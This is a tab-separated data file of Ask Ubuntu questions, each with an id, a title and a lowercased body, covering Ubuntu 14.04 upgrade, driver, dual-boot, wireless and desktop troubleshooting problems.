454039	what command is executed when shutdown from the graphical menu in 14.04 ?	i understand that clicking `` shut down '' from the menu that comes up on clicking the cogwheel triggers the following command to be executed : dbus-send -- system -- print-reply -- dest=org.freedesktop.hal /org/freedesktop/hal/devices/computer org.freedesktop.hal.device.systempowermanagement.shutdown however , when i execute this command on a terminal , i get the following error : error org.freedesktop.dbus.error.serviceunknown : the name org.freedesktop.hal was not provided by any .service files is it because 14.04 uses some other service for shutting down , or am i doing something wrong ? note : this question is in follow-up of : why do we need to be root in terminal for shutdown and restart ?
454041	make ubuntu bootable usb drive using mac ?	i have a netbook that i want to install ubuntu onto because windows is terrible ( especially on that ) . i do have a good mac computer that i can make a bootable usb drive from , but i 'm confused on how to go about making it .
454051	modemmanager detecting wrong modem since upgrade too ubuntu 14.04	lsusb show the correct modem and modem manufacture root @ jativa : ~ # lsusb bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 018 : id 12d1:1506 huawei technologies co. , ltd. e398 lte/umts/gsm modem/networkcard but when is use mmcli wrong manufacture is indicated root @ jativa : ~ # mmcli -m 2 /org/freedesktop/modemmanager1/modem/2 ( device id 'f04b24e76c2ae29b09cb6537cf2901914556318f ' ) -- -- -- -- -- -- -- -- -- -- -- -- - hardware | manufacturer : 'qualcomm incorporated' | model : '8' | revision : '8200c-facpaczq-10388101 1 [ jan 10 2011 10:00:00 ] ' | supported : 'gsm-umts' | current : 'gsm-umts' | equipment id : '353612041734984' the modem manger shows this wrong equipment . although the modem can connect ussd is not working possibly due to the incorrect equipment detection .
454054	how to fix a lubuntu blank screen	lubuntu 12.04 ( english ) installed completely without problems . i installed 12.04 ( arabic ) instead , accepting all questions but i did not understand any arabic wording . i received a ( working ) blue screen , but completely blank without any icons . i can load a cd and then a screen appears so that you can hear the cd clearly . right clicking on the screen shows a few options , which seems to indicate who wrote the software and it also shows some empty lubuntu folders . which commands will show the icons allowing the installed software to be opened ?
454056	wireless not working when driver selected	i have a older laptop but i love linux , i downloaded and installed the newest release last month of ubuntu . i was running it duel-boot style . i can not get the linux side to pick up the wireless signals . when i try to get the proprietary driver to install it starts and never finishes . i have let my laptop sit for hours and nothing . i deleted ubuntu and figured i would ask in here first if there is an easier way to get ubuntu up and running for dummies . i want linux to function at its peak as i am in a lot of computer classes that makes it easier to have access to both operation systems . any and all help is greatly appreciated .
454058	wrong monitor recognised 14.04	i 'm hoping someone can please help me with my display/driver , i have installed ubuntu 14.04 and my 42 '' lcd is being recognised as a 52 '' , resulting in the screen being oversized and not fitting within the borders of my monitor . my graphics card is an nvidia 9500gt connected via hdmi.â i 've tried every possible driver i can find to no avail . i can adjust the undercan settings in nvidia control settings which adjusts it to the right size and looks great , but when i restart my computer and i move the mouse to the edges of the screen everything moves off screen leaving windows beyond the borders . is there anyway i can fix this or change settings so it recognises my monitor as a 42 '' ? it works when i connect a dvi cable , however the screen is just too dark. , so i 'd prefer using hdmi i 've been struggling with this issue for quite awhile now , and with almost every version of ubuntu/linux i 've tried . i have been wanting to make the switch from windows to linux for the freedom it offers . i 'm a bit of a novice with linux and my experience is limited to google and youtube . so any help would be much appreciated.â thanks in advance , steve .
454063	where i can see lintian build logs ?	as a mainly debian user , i love to see the pts with several reports about all the packages for debian repositories , including lintian reports . i 've check out the testing tracker but i have n't seen lintian anywhere . the http : //lintian.ubuntuwire.org/ page only have saucy information and seems abandoned .
454064	how to manually partition a reinstall upgrade to a dual boot	i have a windows xp /ubuntu 12.04 32 bit dual boot system with partitions i created manually . /dev/sda 1 21gb windows os /dev/sda 2 5.2gb ntfs spare unused /dev/sda 3 300mb ext 3 for grub extended /dev/sda 4 /dev/sda 5 2.5gb swap /dev/sda 6 20gb / root ext 4 /dev/sda 7 25gb shared ntfs partition for docs and files free /dev/sda 6gb unallocated my computer is a home build msi k9vgm-v mobo . 80g hd . 2 x 1g ram in two slots . i want to do a fresh install of 14.04 retaining the dual boot . i have 6g unallocated space . i want to add it to the ntfs data partition . can i resize the ntfs data partition during reinstall to add the unallocated space to it ? is there enough space in /dev/sda6 for 14.04 ? i want to upgrade the ram to 2 x 2gb and install the 64 bit ubuntu version . must i change the swap partition , and to what size ? one post in askubuntu says to `` install alongside windows '' but another says to use `` something else '' . which should i do ? does the grub reinstall into the same place automatically or do i have to reinstall it ? if i have to reinstall it is the current partition big enough ?
454065	elevated gui programs all open blank windows	using xfce 4.9 on ubuntu 12.04 . i have some shortcuts that i 've been using for ages to open things as root . for example , 'gksudo konsole ' . these have been working just fine , but all of a sudden , any gui program , whether done by shortcut , command line , gksudo , sudo , etc . will open a window that is blank . it has the title bar , minimize , will resize , etc . all the actual window functions are fine , but the part that would actually show the program is just gray . any ideas why this is happening ?
454067	configuring two half-separate lans using dhcp	i have to set up dhcp that has to assign ips over 2 networks ( 192.168.0.0/24 and 192.168.1.0/24 ) . that is easy and i 've got it working . the question is , is it possible to make pcs from one network accessible to pcs on the other network without allowing the opposite ? ( first network should not be accessible from the second ) . that 's what my teacher has asked me to do and i 'm not even sure whether it is possible ( eg . pinging from first network against second network works , but vice versa will not ) . can anyone shed any light on this ?
454069	appmenu in 14.04 for gtk2 apps ?	appmenu in 14.04 does n't seem to be working for gtk2 apps like pidgin or meld 1.3 , whereas it worked fine in 13.10 . is there a way to fix this ?
454070	login screen is disfigured	this is the second time i see it this way when i startup my machine . you can see that the screen is not fully utilized . ubuntu 's screen starts from the top-left , but does n't fill the whole screen . the underutilized area is n't totally black . but it 's a mauve background with white dots all over it , i think it 's the stock background for the login screen but i 'm not sure . this does n't happen when i lock my screen . what is causing this and how can i fix it ?
454073	is it possible to use chromium extensions on the new webbroswer-app ?	sine the oxide is advertised as a chromum view on qt . i 'm wondering if it 's possible to use chromium extensions on the new webbroswer-app ? ( that would be great for example to use a gmail specific extension in the unity-webapps-gmail )
454074	problem with steam on lubuntu 14.04	pretty simple problem - steam installed , then a thing came up saying it need to install more files . it runs , and then at the end tells me things are missing from my 32x library ? if you need more info i 'll try to answer any ques you have
454075	which version should i download ?	i want to download ubuntu 14.04 ( and i know this will kind of sound newbie-ish but here goes ) which one should i download ? usually , i would pick the 32-bit version but it says for computers with less than 2gb of ram . i have 3gb 's of ram . but not all the specs of my machine can handle 64-bit . so which one , 64 or 32-bit ? here is my computer specs : acer aspire 6935g windows 8 4gb 's of ram ( 3gb 's usable ) intel core 2 duo
454076	remmina - white screen until i press ctrl+t - ubuntu 14.04	i have remmina 0.9.99.1 on ubuntu 14.04 . when i choose a server from the list of connections , remmina connects to the server but the entire screen is white . if i press ctrl +t , then the desktop shows but then i have to press ctrl +t again for the toolbar to go away . in ubuntu 13.10 , all i had to do was click off the remmina window ( or click on a different remmina tab ) to make it inactive , then click back and the desktop will load and it would be scaled to fit . `` remember last view mode for each connection '' is checked and the scale mode is set to hyper . i have tried unchecking certain options and many different scenarios -- it 's almost as if my preferences file is being ignored . a re-install does not fix it . anyone else having this issue or know of a fix ? i may just switch to nomachine if i ca n't get this working , but remmina has been so nice ! thanks !
454082	tar delete progress not shown ?	i was trying to use tar command , -- delete option and met some problems . there are two things i do n't understand : when using -- verbose option with combination of -- delete option , nothing shows as -- verbose usually do , i.e . no show of deleted files . when using -- totals option , the deleted size is always 0 , it does n't make sense and i ca n't figure out the meaning of these output . can anyone help me with these ? the following code shows the procedure . x @ x : ~/bin $ tar -- list -- file=pomo.tar pomodoro pomodoro_2 pomodoro_3 x @ x : ~/bin $ tar -- append -- file=pomo.tar quitpomo -- verbose quitpomo x @ x : ~/bin $ tar -- list -- file=pomo.tar pomodoro pomodoro_2 pomodoro_3 quitpomo x @ x : ~/bin $ tar -- list -- file=pomo.tar -- totals pomodoro pomodoro_2 pomodoro_3 quitpomo total bytes read : 10240 ( 10kib , 12mib/s ) x @ x : ~/bin $ tar -- delete -- file=pomo.tar quitpomo -- total -- verbose total bytes read : 10240 ( 10kib , 86mib/s ) total bytes written : 10240 ( 10kib , 86mib/s ) total bytes deleted : 0
454083	why is dd creating an enormous file when i try to create a backup disk image ?	i 've been trying to get cuda to work on my system and in the process of messing with nvidia drivers i have broken ubuntu badly enough that i 've had to reformat my drive partition multiple times . i 've now been hit with that stick enough times that i 'm trying to back up my partition once i 've installed all my tools and programs and stuff , using dd ( as recommended by a friend ) . however , when i ran sudo dd if=/dev/sda4 of=~/backup.img i eventually got an error that my drive ran out of space . this was strange to me , since the partition is quite large and i have just a fresh ubuntu install along with a few ( small ) programs on it . i figured what might be happening is that it was recursively trying to write a copy of what it had already written , so i tried writing the file directly to another partition instead : sudo dd if=/dev/sda4 of=/media/ye\ olde\ data/ubuntu\ reinstall\ backup/backup.img but this took forever and i aborted the process once the file got to a size i was pretty sure was too big to contain only the data i wanted . what is happening ? is it that /media has the other partitions mounted and thus it 's treating the other partitions as part of /dev/sda4 ? is it that dd copies the entire partition byte-for-byte , ignoring what bytes actually have files on them ? and whatever the case , how can i do what i am trying to do , correctly ? oh , and here 's my disk information , in case it matters : sudo sfdisk -l /dev/sda disk /dev/sda : 62260 cylinders , 255 heads , 63 sectors/track warning : extended partition does not start at a cylinder boundary . dos and linux will interpret the contents differently . units = cylinders of 8225280 bytes , blocks of 1024 bytes , counting from 0 device boot start end # cyls # blocks id system /dev/sda1 * 0+ 12- 13- 102400 7 hpfs/ntfs/exfat /dev/sda2 12+ 14602- 14590- 117187500 7 hpfs/ntfs/exfat /dev/sda3 29192+ 62260- 33069- 265622493+ 5 extended /dev/sda4 14602+ 29191- 14590- 117193728 83 linux /dev/sda5 61228+ 62260- 1032- 8287232 82 linux swap / solaris /dev/sda6 29192+ 61227 32036- 257329138+ 7 hpfs/ntfs/exfat
454085	lazarus version issue	i installed lazarus 1.0.10 from ubuntu , but installed fpc-src 2.6.2 from sourceforge . i got down grade to 1.0.10 when i first run lazarus after that i got leaks package does not exist every time i run lazarus . i would like to know if it is possible to un install and re install to fix the issue ? your help and information is great appreciated , regards , inung
454087	how to upgrade ubuntu 12.04 to 14.04 if i have dual boot with windows 7 ?	i have dual boot with ubuntu 12.04 and windows 7 , and i would like to upgrade ubuntu to 14.04 but still retain my windows 7 , help ! i have a dvd with the ubuntu 14.04 iso
454089	unable to close error message window	have a weird issue , when ever i plug in iphone into my ubuntu 13.10 . i get this error not much of an issue , the annoying thing is i can not close this dialogue . clicking ok does nothing and clicking x does nothing .
454090	clear bling vgrabber malware from chromium	when asked to bring up my chrome bookmarks , i got the dreaded vgrabber and bling . on windows 8.1 i would likely just run a system restore . i wiped my computer clean when i installed ubuntu , so i can not boot from windows . i am not a programmer , and i know this is nasty to get rid of .
454091	how can i get xubuntu to give me the option for additional drivers ? ( looking for nvidia drivers )	i will start with a disclaimer : i have been using xubuntu for a few years now , but i would still consider myself a beginner . when i first installed ( 12.04 ) my computer detected that there were additional drivers available for my nvidia card ( a geforce 540 at the time ) . when the proprietary drivers came out ( 304 ? ) i had to install them manually every time because the install from additional drivers would fail ( sudo sh nvidia- ... ) something happened about 6 months ago , and they began showing up on my updates and being convenient . i assume that means i had added a repository , but i have no idea which one . i recently upgraded to a geforce 750ti , and at the same time tried to upgrade to 14.04 ( from 12.10 ) the update went bad , and i had to reinstall . the newer installation cd would n't even load without the nomodeset option . i no longer have my proprietary drivers , and am currently stuck with a 800x600 resolution . i tried installing nvidia-current with the package manager . it says that it installs them , but then it does n't seem to use them . i have also tried installing the binary drivers directly . ( this gave me a lot of errors and did not work ) . i know that at one point steam was notifying me of the drivers and offering to enable them in the past . i tried installing steam to see if that could be a method , but steam failed to launch with an error about not having opengl . i do n't get why it is n't giving me the option to install from `` additional drivers '' if i can get nvidia-current via apt-get . i have probably spent about 10 hours at this point looking , but have n't found a solution that worked for my situation . please forgive me if this is an extremely stupid question , and thanks in advance for any help you can give .
454093	using the ubuntu installer partition manager ?	i 'm about to install ubuntu 14.04 on my pc . i have created an extended partition and inside that created a 24gb logical ext4 partiton for ubuntu and a 2gb logical swap area . i 've gone into the `` something else '' option and need to know a few things before i continue . first , what does the `` format ? '' option do and should i use it ? second , does it matter if the swap area is listed before or after the ext4 partition ? thanks !
454097	how do speed up my internet ?	my ubuntu machine 's internet is relatively slow in comparison to the rest of my family 's windows machines which almost always have internet at full bars . ( mine is normally 2 of 4 )
454099	removing ubuntu 14.04 and re-install 12.04 ?	i just upgraded to ubuntu 14.04 lts from 12.04 lts and realised that it is simply not right for this particular computer ( i do still plan to use 14.04 with my newer machines ) . i wish to completely remove ver . 14.04 and replace it with 12.04 ... no roll-back or anything necessary . happy just to restore/fresh reinstall 12.04 just as it was . i am even using the exact same dvd that i used to install 12.04 originally when i sucessfully switched from windows . when i try to boot from the dvd , it just seems to go no further than the screen that shows the word ubuntu and the series of red dots below it ( lighting in succession ) to indicate `` progress '' . only thing is.. the led light on the cd/dvd-rom drive stops flickering after a minute or two , as though it is no longer being read . for a long time . the computer does not freeze , but is otherwise unresponsive . could it be that it will just take a very long time to begin the process of ( re ) installing 12.04 ( like `` overnight '' long ) and we should be more patient - or am i simply going about this the wrong way ? any advice , including the correct/conventional way to `` downgrade '' a version of ubuntu would be greatly appreciated . thank you .
454107	laptop wo n't suspend ubuntu 14.04	toshiba satellite l855d with fresh 14.04 lts install , will not suspend , screen goes dark for 2 seconds , then shows the lock screen . another post suggested trying : sudo modprobe toshiba_acpi but this has not made a difference . my computer is an amd a8-4500m apu with radeon ( tm ) hd graphics ă 4 gallium 0.4 on amd aruba . any ideas ?
454114	`` battery not present '' but it is [ 13.10 ]	in 12.04 and windows 8 it recognized the battery just fine.i think it 's this version of ubuntu ( 13.10 ) that has the problem.i have n't istalled any updates.do you think that might be the problem ? should i upgrade to 14.04 and see if it solves it ?
454115	14.04 freezes on boot after installing ubuntu-touch package	i did apt-get install ubuntu-touch and rebooted by ideapad s10-3t to a black screen with a with a blinking _ . how to i boot and use ubuntu-touch ?
454116	is there a command line tool that allows online search for linux commands ?	i know i can do man commandname to find the docs for a specific command , but many times i simply google `` how to list all installed packages sorted by size '' or `` how to find file by content in a folder recursively '' , then usually i get to ask ubuntu / superuser / stackoverflow and 99/100 the accepted / highest voted answer contains the desired command , i copy , paste , and profit . my question is this , is there any command line utility , that does something like this : $ howto `` get available disk space '' and returns $ according to stackoverflow , the command is `` df -h '' with 90 % accuracy $ 1 ) [ run ] $ 2 ) run as sudo $ 3 ) give next suggestion $ 4 ) this is not right ! ( you 'll be able to provide your suggestion next ) $ 5 ) exit it 's a bit like http : //gkoberger.github.io/stacksort/ based on the alt text of this xkcd : http : //xkcd.com/1185/ could n't find anything like it , does it exist ?
454117	why is /bin/true such a large file ? how would i find the source code ?	i just found out about /bin/true yesterday . i 'm not a bash power user by any means , but i decided to check it out . i was surprised to find that it is a 22k file ( ubuntu 12.04 ) , and not one of the smallest utilities in /bin ( e.g . kill is smaller ) . this is really just curiosity , but is there are reason for it not to be a very small bit of code ? how would i go about finding the source code for /bin/true ?
454118	wifi not 100 % detected , same hotspot previously configured , ubuntu 14.04	this `` bug '' still persists after doing a clean install of 14.04 ( coming from 13.10 ) . when i power on , sometimes i just see the wifi icon animation , trying to connect but not succeeding . i do several power off ( or restart ) cycles before my netbook 's wifi detects and connects to my home network . but if i do a suspend , i notice my machine connects right after resume . lspci -nn | grep 0280 output : 05:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) iwconfig output : lo no wireless extensions . eth1 no wireless extensions . wlan1 ieee 802.11abg essid : '' like a virgin '' mode : managed frequency:2.412 ghz access point : 58:6d:8f : cc : dc : f2 retry long limit:7 rts thr : off fragment thr : off power management : off my machine is a samsung nf310 netbook . thanks to @ terdon for guidance .
454122	web app tweak in 14.04 ?	after upgrading to 14.04 , web apps now open in a firefox window without the ff menus or navigation bar , or option to add tabs . i liked it better with those . a major annoyance is the inability to copy/paste between normal ff windows and the web apps . i get that web apps are to treat these like a standalone program , but is there a way i can tweak mine to open in a normal ff windows with menu , nav , and tabs ?
454123	windows 7 not showing up in boot after installing ubuntu	i just installed ubuntu and upon bootup there is no grub , bootloader , or anything . i tried holding down shift while booting , that brought up grub but it did not display windows 7 . i know that windows 7 is still on the disc , because i can view the partition from ubuntu . i 'd appreciate any help y'all can give . thanks !
454124	ubuntu 's software file type ?	i recently tried to install xara as an alternative to my coreldraw , but the file that was downloaded was merely 18.5mb and a .package file . i do n't even know what kind of extensions do software for ubuntu have . i am using ubuntu 13.10 . the file downloaded does n't open ( rather tries to open in gedit , the text editing application ! ) . please tell me what kind of files i need to download that can be `` executed '' as applications/programmes/software in ubuntu . of course i can use terminals and the software centre but i happened to read all that was written on xara 's website and clicked on `` download for ubuntu '' and it did n't work .
454126	ubuntu desktop 14.04 loads very slow and keyboard locks on multiprocessing	i am having the same problem . more than 10 seconds for the desktop to appear ( and actually no desktop after backup restore ) . on top of that the key board is locked when another process is pending action from myself . example : a movie is running on totem but the screen is locked . i then ca n't type my password ! it is not an upgrade but a full new setup . upgrade did n't work at all .
454127	ca n't see korean characters for app names in unity dash	today , i successfully installed 14.04 on my laptop and desktop . for my installations , i made korean my default language . the problem began when i logged in to the desktop . in the image , i was going to complete the word `` screenshot . '' since these apps would appear in their korean names , the korean characters should show . but they did n't ! can i fix this soon ? thanks .
454130	launcher for programs which need multiple commands to run	i already installed a program called cadfeko , and i can run it from terminal . to run the program , first i have to run this command . /opt/feko/6.3/bin/initfeko then i can call the program by cadfeko this does n't release the terminal . also , if i close the program and terminal i have to run the initfeko again . i tried to create a shortcut launcher for this program . i can not figure it out , how can i use combination of these two commands on the same line . i already tried something like this in my .desktop file : exec= . /opt/feko/6.3/bin/initfeko & & cadfeko but this is not working for me . please let me know if there is a solution for this . thanks .
454131	how to mix page numbering on libreoffice writer	i 'm currently preparing a 20-paged document at work and will like to mix page numbers . i will like to number the first 5 pages with roman numerals ( i-v ) and start of the last 15 pages with the usual page numbers ( 1-15 ) at the end the day here 's the output of page numbers i want : first 5 pages : i , ii ... . v next 15 pages : 1 , 2 , 3 ... .. 15 how can i achieve this ?
454133	ntfs freespace issue : disk partitioning for dual boot system ?	am about to partition the 1gb hdd on my existing win8 installation , in preparation for installing kubuntu 14.04 . issue is that the win8 partition program is saying that about half of the remaining space is available for shrinking , yet its barely used ( defrag done ) . currently only ~ 40gb is being used on the ntfs partition for win8 . yet the win8 partition program will only allow me to shrink by 50 % of the remaining ( free ) space . i have run diskcleanup & the defrag program that comes with win8 . i will only be using win8 for less than 5 % of the time so its a complete waste of space giving 50 % to win8 , when i want most of the disk space to be free for kubuntu . i could run the partition program during the kubuntu installation , but read elsewhere that the repartitioning needs to be done via win8 in order for win8 to run under a dual boot ? any suggestions please ? cheers , many thanks andy
454134	main menu on multi-window applications	have any of the developers a recommendation on how to set up multi-window applications so that menus do n't become confused and overlay one another ? an example is gimp , which typically has at least three windows open at any one time . i find it very difficult to navigate the menu morass . i 've tried using the new option to not use the global menu bar , but that places the menus in their respective window title bars instead . since gimp , and many other multi-window applications , use the title bar for information relevant to the data being edited , over-writing that information with the menu bar content is not satisfactory . i should note that i use sloppy mouse focus , which results in menus flashing on and off ( and sometimes disappearing entirely ) as the mouse is moved in and out of the different windows . the keyboard shortcuts to access the menu bar items remain effective , but i do n't like having to memorise lots of obscure combinations . the whole point of a gui is to allow mouse or pointer interaction . please , what 's the recommended setup that will alleviate these problems ?
454138	what 's wrong with this patch [ dwm ] [ uselessgaps ]	so i installed this patch with sudo patch -p1 < 03-dwm-6.0-uselessgaps.diff it returened no errors so now there is a 1px gap between my tiled windows . but when i open my config.h there is no option to change how big the gap is so if anyone could help me out thanks also i installed it on a vannila dwm install with only minor edit to config.h so if anyone knows how to make that gap bigger thanks ?
454143	upgraded to 14.04 reboot fail	i upgraded from 13.10 to 14.04 , and when i restarted the computer and selected ubuntu , the black screen said : mount : mounting/dev/loop0 on/root failed : invalid argument mount : mounting/dev on/root/dev failed : no such file or directory mount : mounting/sys on/root/sys failed : no such file or directory mount : mounting/proc on/root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing init=bootarg . busybox v.1.21.1 ( ubuntu1:1.21.0-1ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) _ can anyone help me fix this ?
454148	android developer tools ubuntu 14.04	i recently updated my computer to ubuntu 14.04 , and i really liked and enjoyed all new features , however within an hour or two , my enjoyment ended . i soon learned that the adt bundle would crash unexpectedly and all of the time . it does n't say it crashed . it just randomly exits and then i 'm left set back a couple of minutes , which is very inconvenient when coding android apps . especially given the fact that it 'crashes ' after only using it for a couple of minutes . is this a common problem ? is this unheard of ? is there a known solution for this ? any help is appreciated . thanks . edit i decided to run adt from the terminal to see what output was there when it 'crashes ' and so here it is . no bp log location saved , using default . [ 000:000 ] cpu : 6.23.10 , x2 , 2668mhz , 1968mb [ 000:000 ] computer model : not available [ 000:000 ] browser xembed support present : 1 [ 000:000 ] browser toolkit is gtk2 . [ 000:000 ] using gtk2 toolkit no bp log location saved , using default . [ 000:000 ] cpu : 6.23.10 , x2 , 2668mhz , 1968mb [ 000:000 ] computer model : not available [ 000:397 ] no bp log location saved , using default . [ 000:397 ] cpu : 6.23.10 , x2 , 2668mhz , 1968mb [ 000:397 ] computer model : not available [ 000:397 ] browser xembed support present : 1 [ 000:397 ] browser toolkit is gtk2 . [ 000:397 ] using gtk2 toolkit [ 000:334 ] no bp log location saved , using default . [ 000:334 ] cpu : 6.23.10 , x2 , 2668mhz , 1968mb [ 000:334 ] computer model : not available segmentation fault ( core dumped ) - so i need a bp log ? i do n't know that is . hope this bit helps .
454149	dual booting ubuntu and windows 7	i am trying to dual boot my sony vaio with insydeh20 bios installed . i am using a usb stick for the install . first the installer does n't see that i have windows 7 installed on the hard drive . when i click on `` something else '' the installer crashes with the error message `` ubi- partman failed with exit code 141 '' .
454153	how do i fix ubuntu if it crashes at start up ? can i download version 12 anywhere ?	sometimes i can go as far as see icons , most time it will freeze and just a blank screen . i replaced win7 . acer aspire ati 3650 . 4gb . it wont let me do anything , reinstalled three times , both with 32 and 64 version . does ubuntu only work on certain specs ? new to ubuntu . thanks
454155	java applets crashing in 14.04	phet simulations ( java applets ) continually crash in 14.04 after execution . icedtea starts loading then the app , gets to 100 % then crashes and i get an error message to us the console to clear my cache and retry ( which doesnt work it just cashes again ) . there are buttons at the bottom of the error message , one is supposed to launch the java console i think but i am uncertain as if you select anything other than 'ok'the error message locks up completely and i have to go to htop to kill it to get it off my screen . is anyone experiencing similar issues or have any suggestions on how to resolve this ? * this same issue is occurring on 2 computers one running ubuntu the other xubuntu the phet simulations in question are running fine on 12.04 , 13.10 and windows .
454156	reflink cloning of lxc container on btrfs ?	i use btrfs on my system and have created an lxc container with xubuntu on it . now i 'd like to use that as a base for other containers . since it 's a btrfs , i can use cp -- reflink to create a copy-on-write copy of a file or folder . this seems kind of ideal in my use case , but i was wondering if lxc-clone will make use of that or create full copies when i use a directory backing rather than btrfs ?
454158	ubuntu 14.04 : wireless crash	i am currently trying to run ubuntu 14.04 lts on my dell inspiron 7720 stock model , i was attempting to dual boot ubuntu 14.04 lts w/ windows 8.1 sp0 . after some issues i was having w/ grub and windows boot manager conflicting i had to backup my files from my data partition and wipe my drive on a us military standard drive wipe ( 3 passes and 1 verify pass ) . now , i have just simply ubuntu 14.04 lts installed , before i state my issue i would like to note that every time i have attempted to install ubuntu ( 10.04 , 12.04 and 13.10 ) on my laptop , i have had this issue . when i attempt to connect to my wireless ethernet , i get a crash of my router ( meaning my hole ethernet goes down , wifi and wired ) but when i plug my laptop in wired , it works perfectly fine . any thoughts ? laptop : dell inspiron 7720 stock model router : thomson ( do n't know the version atm ) modem : thomson ( do n't know the version atm ) i do have a all in one router/modem .
454160	hybrid suspend in 14.04 ?	hybrid suspend was working in 13.10 before upgrade , but no longer . tried both methods mentioned here how do i use pm-suspend-hybrid by default instead of pm-suspend ? but no luck test for support turns up good , pm-suspend and pm-hibernate both work as expected , i just can not get it to transition from suspend to hibernate on its own . machine is thinkpad t430s . does anyone have this working in 14.04 that could share their config ? thanks !
454161	ubuntu installation on usb	i have a 8gb pendrive which i want to use as my hdd i want the ubuntu 14.04 to be installed on usb and i want possibility to save files on the usb , update the system and so on ... i was thinking about putting the iso on usb and use the persistent option , but from what i heard its not safe , because if i boot from usb there will be no login option etc . so how can i do this ? and second thing is if i would install ati driver into usb , will i be able to boot the usb on different computer ? thx
454163	i 'm facing some overheating troubles with ubuntu 14.04	i always had overheating troubles with ubuntu , but this is the first time i 'm here asking help . my fans just do n't works under ubuntu . no fans sound . looks like the ubuntu ca n't recognize'em . i got some high temperatures ( 83째c , being 85째c the critical ) .ubuntu turn off my computer after it reaches the critical temperature , and it becomes slow above 75째c ; on windows , fans works . is there a way to make fans works ? here are my specs : positivo premium ( brazilian brand ) 4gb ram i3 2310m ( 2,10ghz x 4 ) here are the report made from hardinfo from my hardware . https : //drive.google.com/file/d/0b_reqfhoxubeehk1ci05v2jcave/edit ? usp=sharing thanks in advanced
454164	disable left alt ?	i do n't want left alt to do anything , i still want combos like alt-tab to work , but pressing alt should n't do anything . by default it focuses the menu , and sometimes makes my cursor flicker . i disabled it in windows using autohotkey , like this : ; disable a single press of alt , so it 's not so annoying alt : :return
454169	how can one get newsletter from ubuntu ?	i think that every big open source projects has it 's news letter . how to receive ubuntu related news information ?
454172	remove graphical terminal for netbooted image	how do i remove the graphical terminal on a netbooted ubuntu 14.04 based image ? i built this from debootstrap and there is no grub because it 's used a pxe boot process . once it boots up the resolution is too high for my eyes and not only that - too slow . i 'd like to stick with the original non-graphical console .
454173	how to know how dejadup calls duplicity ?	i would like to know how dejadup calls duplicity ( like which shell command with args ) when ask to create a backup . i really like dejadup , but i would like to make a more flexible script by directly using duplicity .
454175	after i turn my ati graphics card off , when i suspend my session then i ca n't log in again [ session ]	i 've ubuntu 12.04 installed and i 've turned graphics card off as it was producing a lot of heat . -now when i suspend my session then i ca n't log in again.when i click the power light gets on but the screen remains blank and i ca n't start the new session .
454177	is there a plugin for rhythmbox to exit on close ?	is there a way for me to get rhythmbox to exit when i press the exit button ? if not , is there a way to remove the exit button all together ? i keep getting tripped up trying to close the music player . i feel silly posting on something that has been raged about like this , but i ca n't find a way to change it . by now , i thought someone would have made a plugin for it .
454183	is tera rising installing ?	hi i 'm a new user on ubuntu , i looked for a solution on internet about this and in the foro too . i try to install games on ubuntu , and so far i manage to do so , ( dont starve , war thunder ) so decide to download tera rising on it , i use wine to start the install proces , and everything is fine so far , the problem is , i see the iccon of the happy cloud , but i cant enter it , and nether see whats going on =s is this common ? and is there any way that i can see the process of the cloud ? also , is it ubuntu , the game , or me the one doing things wrong ? thancks for your support and help â¨
454184	can not boot into the gui mode after installing `` ati binary x.org driver '' from ubuntu software center	the computer can not boot into the gui mode after installing `` ati binary x.org driver '' from ubuntu software center . now i boot into recovery mode - > root - > mount -o remount , rw / . what can i do to fix the problem ? how to delete `` ati binary x.org driver '' ? thank you for your attention -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- desktop information -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- os : ubuntu 14.04 lts ( 64 bits ) display card : msi r4770 cyclone ( ati radeon hd 4770 ) * cpu : amd athlon ii x4 620 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- * `` no additional drivers available '' in `` additional driver '' page
454186	how to run `` apport-collect 1311262 '' in ubuntu 14.04	i have file a bug in launchpad ubuntu . they asked me to run `` apport-collect 1311262 '' . i am unsure how to do this . please help me do this . thanks .
454187	apport-gtk 100 % cpu usage on startup on ubuntu 14.04 lts	i 'm getting 100 % cpu usage at startup consistently by apport-gtk as shown here . according to https : //wiki.ubuntu.com/apport , apport should n't even be running on my machine since it 's not a beta version ( although i upgraded from 14.04 lts beta 2 to the release version ) . finally , i have tried the following to no avail : 1 ) disable apport as described here : http : //linuxg.net/how-to-disable-the-apport-error-reporting-on-ubuntu-14-04-trusty-tahr/ $ cat /etc/default/apport # set this to 0 to disable apport , or to 1 to enable it # you can temporarily override this with # sudo service apport start force_start=1 enabled=0 2 ) i 've disabled all options in system settings > security & privacy > diagnostics tab as shown below . brief system info : $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty $ uname -a linux architect 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux i 've run out of ideas and am not sure what i can do to fix this issue . any ideas ?
454188	network connection problems unresolved	after reading through several threads on here about network connection issues , and trying to solve it on my own , to no avail , i thought i 'd post the problem here . i have an hp chromebook 14 running ubuntu 12.04 . a little over a week ago , shortly after installing ubuntu 12.04 ( unity desktop ) , my internet connection began going out , always after rebooting . sometimes i can connect , but after rebooting i have no idea whether i 'll have any connection when i try to connect again . after some research , i decided to uninstall network manager and install wicd . the inconsistency of internet connection continues . i should add that i know its not the wireless router because all my other devices connect just fine . does anyone have any suggestions given what i 've already tried ?
